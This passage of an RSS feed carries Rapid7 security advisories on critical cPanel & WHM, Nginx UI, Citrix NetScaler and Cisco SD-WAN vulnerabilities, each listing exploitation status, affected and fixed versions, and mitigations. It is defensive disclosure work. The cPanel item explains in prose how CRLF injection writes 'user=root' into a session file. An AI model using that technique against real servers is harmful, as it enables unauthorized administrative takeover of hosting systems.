31);font-size: undefined;'><strong>May 13, 2026</strong></span><span style='color:rgb(31, 31, 31);font-size: undefined;'>: Updated Mitigation guidance section to state that patches expected on May 13 have been published.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-critical-buffer-overflow-in-palo-alto-networks-pan-os-user-id-authentication-portal-cve-2026-0300</link>
      <guid isPermaLink="false">blta1635ea29533345b</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[InsightVM]]></category><dc:creator><![CDATA[Jonah Burgess]]></dc:creator>
      <pubDate>Wed, 06 May 2026 13:27:31 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-41940: cPanel & WHM Authentication Bypass]]></title>
      <description><![CDATA[<h2><span style='color:rgb(67, 67, 67);'>Overview</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>On April 28, 2026, cPanel issued a security update to fix a critical vulnerability affecting the </span><a href="https://www.cpanel.net/products/cpanel-whm-features/" target="_blank"><span style='font-size: undefined;'>cPanel & WHM</span></a><span style='font-size: undefined;'> and </span><a href="https://wpsquared.com/" target="_blank"><span style='font-size: undefined;'>WP Squared</span></a><span style='font-size: undefined;'> products. In the cPanel release notes, the bug was </span><a href="https://docs.cpanel.net/changelogs/136-change-log/#13605" target="_blank"><span style='font-size: undefined;'>described</span></a><span style='font-size: undefined;'> as "an issue with session loading and saving." </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-41940" target="_blank"><span style='font-size: undefined;'>CVE-2026-41940</span></a><span style='font-size: undefined;'>, the identifier subsequently </span><a href="https://www.vulncheck.com/advisories/cpanel-and-whm-authentication-bypass-via-login-flow" target="_blank"><span style='font-size: undefined;'>assigned</span></a><span style='font-size: undefined;'> on April 29, 2026, has a CVSS score of </span><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank"><span style='font-size: undefined;'>9.8</span></a><span style='font-size: undefined;'> and allows unauthenticated remote attackers to bypass authentication and gain unauthorized administrative access to the affected systems. First-party </span><a href="https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026" target="_blank"><span style='font-size: undefined;'>cPanel & WHM</span></a><span style='font-size: undefined;'> and </span><a href="https://docs.wpsquared.com/changelogs/versions/changelog/#13617" target="_blank"><span style='font-size: undefined;'>WP Squared</span></a><span style='font-size: undefined;'> vendor advisories are available.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>cPanel & WHM is web hosting control panel software used to manage websites and servers. WHM provides root-level administration, while cPanel acts as the user-facing interface. Successful exploitation of CVE-2026-41940 grants an attacker control over the cPanel host system, its configurations and databases, and websites it manages. A naive Shodan query for potential targets </span><a href="https://www.shodan.io/search?query=http.favicon.hash%3A-696182543"><span style='font-size: undefined;'>returns</span></a><span style='font-size: undefined;'> approximately 1.5 million cPanel instances exposed to the internet that may be vulnerable.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>A managed cPanel host, KnownHost, stated that CVE-2026-41940 is actively being </span><a href="https://www.knownhost.com/forums/threads/cpanel-zero-day-exploit-network-wide-protections-in-place-for-cpanel-and-whm-logins-ports.6599/" target="_blank"><span style='font-size: undefined;'>exploited in the wild</span></a><span style='font-size: undefined;'>, with speculation of targeted zero-day </span><a href="https://www.reddit.com/r/cpanel/comments/1syyajp/comment/oiz12pp/?utm_source=share&amp;utm_medium=web3x&amp;utm_name=web3xcss&amp;utm_term=1&amp;utm_content=share_button" target="_blank"><span style='font-size: undefined;'>exploitation happening</span></a><span style='font-size: undefined;'> as early as February 23, 2026, prior to the vulnerability’s public disclosure. Security firm watchTowr has published a</span><a href="https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/" target="_blank"><span style='font-size: undefined;'> technical analysis</span></a><span style='font-size: undefined;'> and proof-of-concept exploit for CVE-2026-41940. As such, widespread exploitation in the wild is expected to be imminent.</span></p><h2><span style='color:rgb(67, 67, 67);'>Technical overview</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Systems exposing the affected web service software are vulnerable by default.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As of April 29, 2026, a technical analysis and proof-of-concept exploit have been </span><a href="https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/" target="_blank"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> by security firm watchTowr. CVE-2026-41940 is an authentication bypass caused by a Carriage Return Line Feed </span><a href="https://cwe.mitre.org/data/definitions/93.html" target="_blank"><span style='font-size: undefined;'>(CRLF) injection</span></a><span style='font-size: undefined;'> in the login and session loading processes of cPanel & WHM.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Before authentication occurs, `cpsrvd` (the cPanel service daemon) writes a new session file to the disk. The vulnerability allows an attacker to manipulate the `whostmgrsession` cookie by omitting an expected segment of the cookie value, avoiding the encryption process typically applied to an attacker-provided value. Attackers can inject raw `\r\n` characters via a malicious basic authorization header, and the system subsequently writes the session file without sanitizing the data. As a result, the attacker can insert arbitrary properties, such as `user=root`, into their session file. After triggering a reload of the session from the file, the attacker establishes administrator-level access for their token.</span></p><h2><span style='color:rgb(67, 67, 67);'>Mitigation guidance</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations running on-premise instances of cPanel & WHM or WP Squared should prioritize upgrading to a fixed version on an emergency basis. Some hosting providers </span><a href="https://www.namecheap.com/status-updates/ongoing-critical-security-vulnerability-in-cpanel-april-28-2026/" target="_blank"><span style='font-size: undefined;'>have opted</span></a><span style='font-size: undefined;'> to temporarily institute workaround TCP port blocks for cPanel & WHM web services on ports 2083 and 2087. However, defenders are strongly advised to patch, rather than implement workarounds.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Affected Software:</strong></span></p><p><span style='font-size: undefined;'>The vendor states that all versions after </span><span style='font-size: undefined;'><span data-type='inlineCode'>11.40</span></span><span style='font-size: undefined;'> are affected, prior to the following available fixed versions.</span></p><ul><li><span style='font-size: undefined;'>cPanel & WHM </span><span style='font-size: undefined;'><span data-type='inlineCode'>11.86.0</span></span><span style='font-size: undefined;'> versions prior to </span><span style='font-size: undefined;'><strong>fixed version </strong></span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>11.86.0.41</strong></span></span></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>cPanel & WHM </span><span style='font-size: undefined;'><span data-type='inlineCode'>11.110.0</span></span><span style='font-size: undefined;'> versions prior to </span><span style='font-size: undefined;'><strong>fixed version </strong></span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>11.110.0.97</strong></span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>cPanel & WHM </span><span style='font-size: undefined;'><span data-type='inlineCode'>11.118.0</span></span><span style='font-size: undefined;'> versions prior to </span><span style='font-size: undefined;'><strong>fixed version </strong></span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>11.118.0.63</strong></span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>cPanel & WHM </span><span style='font-size: undefined;'><span data-type='inlineCode'>11.126.0</span></span><span style='font-size: undefined;'> versions prior to </span><span style='font-size: undefined;'><strong>fixed version </strong></span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>11.126.0.54</strong></span></span></p></li><li><span style='font-size: undefined;'>cPanel & WHM </span><span style='font-size: undefined;'><span data-type='inlineCode'>11.130.0</span></span><span style='font-size: undefined;'> versions prior to </span><span style='font-size: undefined;'><strong>fixed version </strong></span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>11.130.0.19</strong></span></span></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>cPanel & WHM </span><span style='font-size: undefined;'><span data-type='inlineCode'>11.132.0</span></span><span style='font-size: undefined;'> versions prior to </span><span style='font-size: undefined;'><strong>fixed version </strong></span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>11.132.0.29</strong></span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>cPanel & WHM </span><span style='font-size: undefined;'><span data-type='inlineCode'>11.134.0</span></span><span style='font-size: undefined;'> versions prior to </span><span style='font-size: undefined;'><strong>fixed version </strong></span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>11.134.0.20</strong></span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>cPanel & WHM </span><span style='font-size: undefined;'><span data-type='inlineCode'>11.136.0</span></span><span style='font-size: undefined;'> versions prior to </span><span style='font-size: undefined;'><strong>fixed version </strong></span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>11.136.0.5</strong></span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>WP Squared versions prior to </span><span style='font-size: undefined;'><strong>fixed version </strong></span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>136.1.7</strong></span></span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Please read the </span><a href="https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026" target="_blank"><span style='font-size: undefined;'>vendor advisory</span></a><span style='font-size: undefined;'> for the latest guidance.</span></p><h2><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-41940 with authenticated vulnerability checks available in the April 30, 2026 content release.</span></p><h2><span style='color:rgb(67, 67, 67);'>Updates</span></h2><ul><li><span style='font-size: undefined;'><strong>April 29, 2026:</strong></span><span style='font-size: undefined;'> Initial publication.</span></li><li><span style='font-size: undefined;'><strong>April 30, 2026:</strong></span><span style='font-size: undefined;'> Update mitigation guidance with additional fixed version numbers and change wording to reflect availability of vulnerability checks.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-41940-cpanel-whm-authentication-bypass</link>
      <guid isPermaLink="false">bltc7a4566b880fefdd</guid>
      <category><![CDATA[Emerging Threats]]></category>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Wed, 29 Apr 2026 20:00:20 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-33032: Nginx UI Missing MCP Authentication]]></title>
      <description><![CDATA[<h2>Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On March 30, 2026, a security advisory was </span><a href="https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h6c2-x2m2-mwhf" target="_blank"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> for a critical vulnerability affecting </span><a href="https://github.com/0xJacky/nginx-ui" target="_blank"><span style='font-size: undefined;'>Nginx UI</span></a><span style='font-size: undefined;'>. Nginx UI is an open-source web interface to centralize the management of Nginx configurations and SSL certificates. The critical vulnerability, </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-33032" target="_blank"><span style='font-size: undefined;'>CVE-2026-33032</span></a><span style='font-size: undefined;'>, was reported in early March by Pluto Security researcher Yotam Perkal and </span><a href="https://pluto.security/blog/mcp-bug-nginx-security-vulnerability-cvss-9-8/#Timeline" target="_blank"><span style='font-size: undefined;'>subsequently patched</span></a><span style='font-size: undefined;'> on March 15, 2026. That same day, Pluto Security </span><a href="https://pluto.security/blog/mcp-bug-nginx-security-vulnerability-cvss-9-8/" target="_blank"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> a technical blog post with some vulnerability details.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-33032 is a missing authentication bug with a CVSS score of </span><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank"><span style='font-size: undefined;'>9.8</span></a><span style='font-size: undefined;'>; as a result of missing authentication controls, an unauthenticated attacker who exploits </span><a href="https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762" target="_blank"><span style='font-size: undefined;'>CVE-2026-27944</span></a><span style='font-size: undefined;'> to leak information can access a </span><a href="https://modelcontextprotocol.io/docs/getting-started/intro" target="_blank"><span style='font-size: undefined;'>Model Context Protocol (MCP)</span></a><span style='font-size: undefined;'> server that can perform privileged operations on managed Nginx web servers. Systems are vulnerable in the default IP allowlist configuration, which allows any remote IP to access MCP functionality. Exploitation results in full attacker control of the managed Nginx service. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>According to a Recorded Future </span><a href="https://www.recordedfuture.com/blog/march-2026-cve-landscape" target="_blank"><span style='font-size: undefined;'>report</span></a><span style='font-size: undefined;'> published on April 13, 2026, exploitation of CVE-2026-33032 in the wild has begun. A PurpleOps </span><a href="https://purple-ops.io/blog/nginx-server-takeover-apr-16" target="_blank"><span style='font-size: undefined;'>report</span></a><span style='font-size: undefined;'> published on April 16, 2026 associated exploitation of CVE-2026-33032 in the wild with the information leak vulnerability CVE-2026-27944, indicating that these two vulnerabilities are being exploited as a chain.</span></p><h2>Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations running Nginx UI should prioritize updating on an urgent basis to remediate CVE-2026-33032. Additionally, to reduce exposure to future vulnerabilities affecting Nginx UI, defenders should ensure that network access to the Nginx UI management interface is strictly limited to those who must have it.</span></p><h3><span style='font-size: undefined;'>Affected versions:</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>According to the </span><a href="https://pluto.security/blog/mcp-bug-nginx-security-vulnerability-cvss-9-8/#post-item-10" target="_blank"><span style='font-size: undefined;'>finder’s blog post</span></a><span style='font-size: undefined;'>, version 2.3.3 and prior are affected, and the fix is present</span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>in version 2.3.4 and later. However the official</span><a href="https://www.cve.org/CVERecord?id=CVE-2026-33032" target="_blank"><span style='font-size: undefined;'> CVE record</span></a><span style='font-size: undefined;'> states that versions 2.3.5 and below are affected. The information leak vulnerability being exploited in the wild with CVE-2026-33032, CVE-2026-27944, was patched in version 2.3.3. This discrepancy in affected version numbers introduces confusion as to the correct version required to remediate CVE-2026-33032. To avoid this version number discrepancy, </span><span style='font-size: undefined;'><strong>users are advised to update to the very</strong></span><a href="https://github.com/0xJacky/nginx-ui/releases" target="_blank"><span style='font-size: undefined;'><strong> latest</strong></span></a><span style='font-size: undefined;'><strong> version (2.3.6)</strong></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Please read the vendor </span><a href="https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h6c2-x2m2-mwhf" target="_blank"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> for the latest guidance.</span></p><h2>Rapid7 customers</h2><h3>Exposure Command, InsightVM, and Nexpose</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-33032 with unauthenticated checks available in the April 17 content release.</span></p><h2>Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>April 16, 2026: Initial publication.</span></p></li><li><span style='font-size: undefined;'>April 17, 2026: Added additional details on exploitation workflow, vulnerable software versions, and product coverage.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-33032-nginx-ui-missing-mcp-authentication</link>
      <guid isPermaLink="false">bltea60b37bc7c9d5ee</guid>
      <category><![CDATA[Emerging Threats]]></category>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Thu, 16 Apr 2026 19:44:49 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-3055: Citrix NetScaler ADC and NetScaler Gateway Out-of-Bounds Read]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On March 23, 2026, Citrix </span><a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696300&amp;articleURL=NetScaler_ADC_and_NetScaler_Gateway_Security_Bulletin_for_CVE_2026_3055_and_CVE_2026_4368"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> a security advisory for a critical vulnerability affecting their NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) products. This vulnerability, </span><a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696300&amp;articleURL=NetScaler_ADC_and_NetScaler_Gateway_Security_Bulletin_for_CVE_2026_3055_and_CVE_2026_4368"><span style='font-size: undefined;'>CVE-2026-3055</span></a><span style='font-size: undefined;'>, which is classified as an out-of-bounds read and holds a CVSS score of </span><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L"><span style='font-size: undefined;'>9.3</span></a><span style='font-size: undefined;'>, allows unauthenticated remote attackers to leak potentially sensitive information from the appliance's memory.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The Citrix advisory states that </span><span style='font-size: undefined;'><strong>systems configured as a SAML Identity Provider (SAML IDP) are vulnerable</strong></span><span style='font-size: undefined;'>, whereas default configurations are unaffected. This SAML IDP configuration is likely a very common configuration for organizations utilizing single sign-on. Per the </span><a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696300&amp;articleURL=NetScaler_ADC_and_NetScaler_Gateway_Security_Bulletin_for_CVE_2026_3055_and_CVE_2026_4368"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'>, organizations can determine if they have an appliance configured as a SAML IDP Profile by inspecting their NetScaler Configuration for the specified string: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>add authentication samlIdPProfile .*</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-3055 affects NetScaler ADC and NetScaler Gateway versions 14.1 before 14.1-66.59 and 13.1 before 13.1-62.23, as well as NetScaler ADC 13.1-FIPS and 13.1-NDcPP before 13.1-37.262. The advisory notes that </span><span style='font-size: undefined;'><strong>only customer-managed instances are affected, not cloud instances managed by Citrix</strong></span><span style='font-size: undefined;'>.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>As of the advisory’s publication, there is no known in-the-wild exploitation and no public proof-of-concept (PoC) available. According to Citrix, the vulnerability was identified internally via security review. However, </span><span style='font-size: undefined;'><strong>exploitation of CVE-2026-3055 is likely to occur once exploit code becomes public.</strong></span><span style='font-size: undefined;'> Therefore, it is crucial that customers running affected Citrix systems remediate this vulnerability as soon as possible; Citrix software has previously seen memory leak vulnerabilities broadly exploited in the wild, including the infamous “CitrixBleed” vulnerability, </span><a href="https://www.cybersecuritydive.com/news/citrixbleed-patch-hunt-malicious/699164/"><span style='font-size: undefined;'>CVE-2023-4966</span></a><span style='font-size: undefined;'>, in 2023.</span></p><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'><em>Update #1:</em></span><span style='font-size: undefined;'> On March 29, 2026, a </span><a href="https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/"><span style='font-size: undefined;'>technical analysis</span></a><span style='font-size: undefined;'> of the vulnerability was published by watchTowr Labs. On March 30, 2026, CVE-2026-3055, was </span><a href="https://www.cisa.gov/news-events/alerts/2026/03/30/cisa-adds-one-known-exploited-vulnerability-catalog"><span style='font-size: undefined;'>added</span></a><span style='font-size: undefined;'> to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of known exploited vulnerabilities (KEV), based on evidence of active exploitation. A Metasploit module for CVE-2026-3055 is available </span><a href="https://github.com/rapid7/metasploit-framework/pull/21204"><span style='font-size: undefined;'>here</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations running affected on-premise instances of NetScaler ADC and NetScaler Gateway should prioritize upgrading to fixed versions on an emergency basis to remediate CVE-2026-3055.</span></p><p></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Affected components:</strong></span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>NetScaler ADC and NetScaler Gateway versions 14.1, </span><span style='font-size: undefined;'><strong>fixed in 14.1-66.59</strong></span><span style='font-size: undefined;'>.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>NetScaler ADC and NetScaler Gateway versions 13.1, </span><span style='font-size: undefined;'><strong>fixed in 13.1-62.23</strong></span><span style='font-size: undefined;'>.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>NetScaler ADC 13.1-FIPS and 13.1-NDcPP, </span><span style='font-size: undefined;'><strong>fixed in 13.1-37.262</strong></span><span style='font-size: undefined;'> (also referred to as 13.1.37.262 in the vendor advisory).</span></p></li></ul></ul><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Please read the vendor </span><a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696300&amp;articleURL=NetScaler_ADC_and_NetScaler_Gateway_Security_Bulletin_for_CVE_2026_3055_and_CVE_2026_4368"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> (CTX696300) for the latest guidance.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-3055 on Citrix NetScaler ADC with an authenticated vulnerability check expected to be available in the March 26 content release.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>March 23, 2026:</strong></span><span style='font-size: undefined;'> Initial publication.</span></p></li><li><strong>March 30, 2026</strong>: Updated customer content release date.</li><li><span style='font-size: undefined;'><strong>March 31, 2026:</strong></span><span style='font-size: undefined;'> Updated overview to note the availability of a technical analysis, addition to KEV, and Metasploit module.</span></li></ul><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-3055-citrix-netscaler-adc-and-netscaler-gateway-out-of-bounds-read</link>
      <guid isPermaLink="false">blt568558d54685b474</guid>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Mon, 23 Mar 2026 19:30:51 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Critical Cisco Catalyst Vulnerability Exploited in the wild (CVE-2026-20127)]]></title>
      <description><![CDATA[<h2><span style='color:rgb(31, 31, 31);'>Overview</span></h2><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>On February 25, 2026, Cisco </span><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk"><span style='font-size: undefined;'>disclosed</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> a critical authentication bypass vulnerability in Cisco Catalyst SD‑WAN Controller and Cisco Catalyst SD‑WAN Manager, tracked as </span><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk"><span style='font-size: undefined;'>CVE‑2026‑20127</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'>, that allows an unauthenticated attacker to gain administrative access to affected systems. The Cisco Catalyst SD-WAN Controller and Manager are core components of Cisco’s software-defined wide area networking (SD-WAN) architecture. The issue was originally identified and </span><a href="https://www.cyber.gov.au/sites/default/files/2026-02/ACSC-led%20Cisco%20SD-WAN%20Hunt%20Guide.pdf"><span style='font-size: undefined;'>reported </span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'>by Australian cybersecurity authorities, who observed real‑world attacks leveraging this flaw. </span></p><p></p><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Customers running these products must urgently upgrade to a fixed release to prevent further compromise. This vulnerability affects the following deployment types: </span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>On-Prem Deployment</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Cisco Hosted SD-WAN Cloud</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Cisco Hosted SD-WAN Cloud - Cisco Managed</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Cisco Hosted SD-WAN Cloud - FedRAMP Environment</span></p></li></ul><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>At the time of disclosure, Cisco Talos published a </span><a href="https://blog.talosintelligence.com/uat-8616-sd-wan/"><span style='font-size: undefined;'>report</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> that outlined how malicious actors in the wild leveraged CVE-2026-20127 to gain initial access, then downgraded the software version on the compromised system for post-exploitation activity. After the targeted system had been downgraded to an older vulnerable firmware release, the attackers exploited </span><a href="https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-sd-wan-priv-E6e8tEdF.html"><span style='font-size: undefined;'>CVE-2022-20775</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> to escalate privileges and gain root access to the system. This exploitation in the wild led CISA to issue an </span><a href="https://www.cisa.gov/news-events/directives/ed-26-03-mitigate-vulnerabilities-cisco-sd-wan-systems"><span style='font-size: undefined;'>emergency directive</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> to Federal Civilian Executive Branch (FCEB) agencies requiring that patches be installed by 5:00PM ET February 27, 2026.</span></p><p><span style='color:rgb(31, 31, 31);font-size: undefined;'>On March 11, 2026, Rapid7 Labs published a full </span><a href="https://attackerkb.com/topics/bP3FMvHe7z/cve-2026-20127/rapid7-analysis"><span style='font-size: undefined;'>technical analysis</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> of CVE-2026-20127. This analysis details the root cause of the vulnerability, and shows how successful exploitation can bypass authentication to inject a malicious SSH key that allows the attacker access to the SD-WAN Controllers NETCONF service. </span></p><h2><span style='color:rgb(31, 31, 31);'>Mitigation guidance</span></h2><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>At the time of the advisory’s publication, Cisco does not recommend any workaround strategies for remediation. Organizations running affected instances of Cisco Catalyst SD-WAN Controller or Cisco Catalyst SD-WAN Manager should </span><span style='color:rgb(31, 31, 31);font-size: undefined;'><strong>prioritize upgrading to a fixed version</strong></span><span style='color:rgb(31, 31, 31);font-size: undefined;'>, as outlined below, to remediate CVE-2026-20127.</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'><strong>Affected Cisco Catalyst SD-WAN major version recommendations:</strong></span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>20.11 Release - upgrade to version 20.12.6.1 or above.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>20.12.5 Release - upgrade to version 20.12.5.3 or above.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>20.12.6 Release - upgrade to version 20.12.6.1 or above.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>20.13 Release - upgrade to version 20.15.4.2 or above.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>20.14 Release - upgrade to version 20.15.4.2 or above.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>20.15 Release - upgrade to version 20.15.4.2 or above.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>20.16 Release - upgrade to version 20.18.2.1 or above.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>20.18 Release - upgrade to version 20.18.2.1 or above.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>20.9 Release - upgrade to version 20.9.8.2 or above </span><span style='color:rgb(31, 31, 31);font-size: undefined;'><em>(Cisco estimates a patch availability date of February 27, 2026 for this release)</em></span><span style='color:rgb(31, 31, 31);font-size: undefined;'>.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Systems running release versions below 20.9 should be migrated to a newer major version with a fix available.</span></p></li></ul></ul><p></p><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>For the latest guidance, </span><a 